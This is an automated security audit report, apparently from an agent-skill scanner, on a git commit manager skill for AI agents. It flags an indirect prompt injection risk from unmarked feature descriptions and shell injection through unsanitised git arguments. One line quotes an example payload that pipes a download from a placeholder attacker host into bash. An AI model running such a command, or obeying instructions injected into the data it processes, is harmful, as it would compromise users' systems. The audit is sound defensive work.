ac-commit-manager
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [PROMPT_INJECTION] (HIGH): Indirect Prompt Injection vulnerability due to unsafe processing of untrusted data.
- Ingestion points: The skill ingests feature-specific data from
ac-task-executorand reads file changes from the local project environment. - Boundary markers: None detected. There are no delimiters or specific instructions for the agent to ignore instructions embedded within feature descriptions or commit messages.
- Capability inventory: The skill executes shell-level operations including
git commit,git tag, andgit reset/revert(rollback) via thescripts/commit_manager.pymodule. - Sanitization: Absent. The documentation does not specify any sanitization, escaping, or validation of feature IDs or commit messages before they are passed to the git binary. A malicious feature description like
feature-01"; curl attacker.com/exploit | bash; #could lead to full system compromise. - [COMMAND_EXECUTION] (HIGH): The skill possesses high-privilege capabilities to modify the repository state and project history. While the
protected_filesconfiguration attempts to exclude sensitive files like.env, the lack of input validation on the commands themselves allows an attacker to bypass these restrictions via shell injection.
Recommendations
- AI detected serious security threats
Audit Metadata